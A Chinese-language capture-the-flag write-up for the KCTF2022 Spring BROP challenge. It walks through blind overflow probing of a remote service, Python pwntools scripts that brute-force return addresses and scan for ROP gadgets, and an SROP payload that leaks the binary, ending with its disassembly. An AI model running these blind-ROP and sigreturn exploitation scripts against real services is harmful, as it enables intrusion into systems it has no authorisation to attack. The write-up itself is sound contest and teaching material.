KCTF2022 春第六题 BROP

信息收集

爆破低字节，函数基址

nc远程连接程序，接收到hacker, TNT!\n后等待用户输入，输入A*16后获得回馈TNT TNT!\n，输入A*17后连接断开，推测程序如下：

void myRead(){

    char buf[8] = {0};

    read(0,buf,0x1000);

    return;
}

int main(){

    puts("hacker, TNT!");

    myRead()

    puts("TNT TNT!");

    return 0;
}

尝试爆破返回地址低字节，最终获得回馈如下

『NORMAL HEAD』================>『0XB0』    

『STOP』================>『0XB5』         

『STOP』================>『0XB6』         

『STOP』================>『0XC9』           

『STOP』================>『0XED』

『STOP』================>『0XEE』        

『STOP』================>『0XEF』

『STOP』================>『0XF2』

『STOP』================>『0XF3』

『STOP』================>『0XD8』

再次尝试爆破基址得出base=0X400000，并且多次连接不会改变，推断程序没有开启PIE；构造rop尝试返回地址仅出现3种情况

程序进入等待（推测等待用户输入），输入后crash
crash
正常流程执行，既返回到main或原定返回地址中

获取gadget

def testRetRop(base):

    for i in range(base,base+0x1000):

        p,pb,libc = init(r="123.59.196.133:10012",log="info",lg=1)

        p.sendlineafter("hacker, TNT!\n",b"A"*0x10+p64(i)+p64(mainAddr))

        try:

            r = p.recvuntil("hacker, TNT!\n",timeout=0.1)

            if(r == b""):

                p.close()

                continue

            else:

                vLog("RET",i)

            p.close()

            continue

        except:

            p.close()

            continue
 
def testPopRop(base,c):

    for i in range(base,base+0x1000):

        p,pb,libc = init(r="123.59.196.133:10012",log="info",lg=1)

        p.sendlineafter("hacker, TNT!\n",b"A"*0x10+p64(i)+p64(0)*c+p64(mainAddr))

        try:

            r = p.recvuntil("hacker, TNT!\n",timeout=0.1)

            if(r == b""):

                p.close()

                continue

            else:

                vLog("POP {}".format(c),i)

            p.close()

            continue

        except:

            p.close()

            continue

最后得到如下结果

『RET』================>『0X400101』

『RET』================>『0X400106』

『POP 2』================>『0X4000F5』

『POP 2』================>『0X4000FA』

『POP 2』================>『0X4000FB』

『POP 2』================>『0X4000FD』

『POP 2』================>『0X4000FE』

『POP 2』================>『0X400100』

『POP 2』================>『0X400102』

归纳&测试

经测试地址及指令如下

『NORMAL HEAD』================>『0X4000B0』    main函数地址

『STOP』================>『0X4000C7』           syscall

『STOP』================>『0X4000C9』           call func

『STOP』================>『0X4000EE』           read ret

攻击测试 SROP

###已知地址

mainAddr = 0X4000B0

readRet = 0X4000EE

sysCall = 0X4000c7

base = 0x400000
 
p,pb,libc = init(r="123.59.196.133:10053",log="debug",lg=0)
 
frame = SigreturnFrame()

frame.rip = sysCall

frame.rax = 1

frame.rdi = 1

frame.rsi = base

frame.rdx = 0x1000

frame.rsp = base

frame.rbp = base
 
p.sendlineafter("hacker, TNT!\n",b"A"*0x10+p64(readRet)+p64(sysCall)+bytes(frame))
 
sleep(0.1)

p.send(b"A"*15)

r = p.recv(0x578)

f = open("./pwn","wb")
f.write(r)
f.flush()
 
p.interactive()

最终成功泄露出程序

4000B0 mov     eax, 1

4000B5 mov     rdi, rax                        ; fd

4000B8 mov     rsi, offset hello               ; buf

4000C2 mov     edx, 0Dh                        ; count

4000C7 syscall                                 ; LINUX - sys_write

4000C9 call    TNT66666
4000C9

4000CE mov     eax, 1

4000D3 mov     rdi, rax                        ; error_code

4000D6 mov     rsi, offset byebye              ; "TNT TNT!\n"

4000E0 mov     edx, 9                          ; count

4000E5 syscall                                 ; LINUX - sys_write

4000E7 mov     eax, 3Ch ; '<'

4000EC syscall                                 ; LINUX - sys_exit
4000EC

4000EC _start endp
4000EC
4000EE

4000EE ; =============== S U B R O U T I N E =======================================
4000EE
4000EE

4000EE TNT66666 proc near                      ; CODE XREF: _start+19↑p

4000EE sub     rsp, 10h

4000F2 xor     rax, rax

4000F5 mov     edx, 400h                       ; count

4000FA mov     rsi, rsp                        ; buf

4000FD mov     rdi, rax                        ; fd

400100 syscall                                 ; LINUX - sys_read

400102 add     rsp, 10h

400106 retn
400106

400106 TNT66666 endp